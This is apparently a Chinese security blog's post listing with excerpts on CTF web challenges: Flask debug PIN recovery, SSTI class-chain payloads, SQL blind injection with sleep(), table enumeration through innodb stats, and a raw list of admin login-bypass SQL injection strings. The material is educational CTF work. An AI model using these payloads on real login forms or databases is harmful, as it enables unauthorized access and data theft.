- 博客(11)
- 资源 (1)
- 收藏
- 关注
原创 current_app flask
flask原生提供current_app, application 一旦启动,就可以通过current_app.config 获取当前application的所有配置。
2020-03-30 15:05:29 235
原创 Flask debug 模式 PIN 码获取
本文由一道CTF题讲解。[GYCTF2020]FlaskApp(BUUCTF有原题)讲解PIN 机制在 Flask debug 模式 PIN 码生成机制安全性研究笔记 一文中有详细的研究。由官方write up总结出,生成PIN的关键值有如下几个:服务器运行flask所登录的用户名。 通过/etc/passwd中可以猜测为flaskweb 或者root ,此处用的flaskweb{...
2020-03-30 11:16:31 2155
原创 SSTI注入语句总结
说明所有测试环境都在python3.*环境完成。0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request):‘’.class.mro[1]{}.class.bases[0]().class.bases[0][].class.bases[0]request.class.mro[1...
2020-03-30 11:00:31 859
原创 admin登录绕过
' or ''-'" or ""-"" or true--' or true--admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin'...
2020-03-21 13:40:20 1131
转载 flag区分大小写的SQL盲注
一.环境搭建先自己创建两个数据表。这个是我们需要查询的数据表。自己搭建一个极其简单的sql查询网页。环境代码:#sql.php<!DOCTYPE html><html><head> <title>ezsqli</title></head><body><form action...
2020-03-21 10:07:57 806
原创 SQL盲注
0x00盲注的一般模式1.and 0mysql> select * from bsqli where id = 1 and 1(payload结果) and sleep(1);Empty set (1.00 sec)mysql> select * from bsqli where id = 1 and 0(payload结果) and sleep(1);Empty set ...
2020-03-17 08:42:06 1274
转载 经典写配置漏洞与几种变形
0x00利用点preg_replace在替换的时候会吃掉转义符0x01 基础版特点:正则贪婪模式、无s单行模式:<?php$api = addslashes($_GET['api']);$file = file_get_contents('./option.php');$file = preg_replace("/\\\$API = '.*';/", "\$API = '{$a...
2020-03-15 11:18:22 190
原创 用innodb_index_stats和innodb_table_stats查找表名
总览从MySQL 5.5开始,默认存储引擎称为InnoDB。在MySQL 5.5及更高版本中,如果执行“ select @@ innodb_version”,则可以看到InnoDB的版本,该版本与MySQL的版本几乎相同。但是在MySQL 5.6及更高版本中,我注意到InnoDB创建了2个新表。“ innodb_index_stats”和“ innodb_table_stats”。这两个表都...
2020-03-13 20:42:03 1652
翻译 MySQL和MariaDB提取表和列的方法
Sys这些实验在MySQL 5.7.9mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();+-------------+| object_name |+-------------+| emails || flag ...
2020-03-13 19:51:28 519
原创 ezsqli(GYCTF-WEB)
1.知识点SQL盲注:布尔盲注无列名盲注2.分析题目过滤了or和union,无法使用Information_Schema.Tables。之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。但是我们首先需要查找flag所在的表名,这里我们参考Alternatives to Extract Tables and Columns ...
2020-03-13 12:26:51 848
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人